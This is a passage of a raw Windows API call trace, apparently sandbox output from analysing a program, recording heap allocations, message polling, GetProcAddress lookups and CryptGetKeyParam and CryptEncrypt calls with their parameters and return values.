lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.910] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.911] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0036.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0036.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae928 [0036.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0036.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.916] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0036.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0036.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0036.916] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.916] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.916] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.917] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.917] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.917] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.918] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.918] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x793e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x7940) returned 1 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 